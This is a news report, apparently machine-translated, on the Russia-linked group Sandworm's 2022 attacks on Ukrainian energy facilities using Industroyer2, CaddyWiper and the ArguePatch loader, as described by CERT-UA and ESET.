Sandworm continues to attack Ukraine


Security experts from ESET reported that Sandworm continues to conduct cyber attacks against organizations in Ukraine.

Sandworm (also known as Telebots, Voodoo Bear, Iron Viking and BlackEnergy) — also known as Unit 74455, is supposedly a Russian cyber-military unit of the GRU, the organization responsible for Russian military intelligence.

The group is believed to be behind a cyberattack on Ukraine’s power grid in December 2015, cyberattacks on Ukraine in 2017 using the NotPetya malware, various attempts to interfere in the French presidential election in 2017, and cyberattacks on the computer network of the Pyeongchang Winter Olympics in 2018.

In April Sandworm attacked energy facilities in Ukraine with a new strain of malware Industroyer ICS (INDUSTRIROYER2) and the new version viper CaddyWiper .

According to CERT-UA, the subjects of the nation-state targeted high-voltage electrical substations with the help of INDUSTRIYER2, the variant analyzed by the researchers was adapted for target substations.

Attackers also used CADDYWIPER viper to attack Windows-based systems, and server hardware running Linux operating systems was hit with destructive scenarios ORCSHRED, SOLOSHRED, AWFULSHRED.

“Centralized distribution and launch of CADDYWIPER is carried out through the Group Policy Mechanism (GPO). The POWERGAP PowerShell script was used to add a group policy that loads file destructor components from a domain controller and creates a scheduled task on the computer.” it says in bulletin , published by the Ukrainian CERT. “The possibility of horizontal movement between local network segments is provided by creating chains of SSH tunnels. IMPACKET is used for remote command execution.”

CERT-UA claims that APT groups have launched at least two waves of attacks on energy facilities. The initial hack occurred no later than February 2022. Interestingly, the shutdown of electrical substations and decommissioning of the company’s infrastructure was scheduled for Friday evening, April 8, 2022.

However, the attacks were detected and neutralized by government experts with the help of cybersecurity companies ESET and Microsoft.

CERT-UA collected indicators of compromise for these attacks and shared them, along with the Yara rules, with a limited number of international partners and Ukrainian energy companies.

ESET, which helped the Ukrainian government, published a detailed report on the viper Industriyer2, which was used to attack a Ukrainian energy company.

Now ESET specialists have announced the discovery of a new variant of the malicious loader used by attackers as part of attacks Industroyer2 , CERT-UA tracked the malicious code as ArguePatch.

According to the researchers, a fixed version of the HexRaysSA IDA Pro remote debugging server was used in the attacks on Industriyer2 (win32_remote.exe ), in which the code for decryption and launch was included CaddyWiper from an external file.

The APT group hid ArguePatch in the ESET executable (eset_ssl_filtered_cert_importer.exe ), malicious code was overwritten in a function called during initialization of the MSVC runtime.

Analysis of the embedded code showed that at a certain time it acts as a loader of malware of the next stage.

“This approach replaces the need to configure a scheduled Windows task for future hacking. Perhaps this is a way to avoid detection using known TTP.” explained ESET in a series of tweets.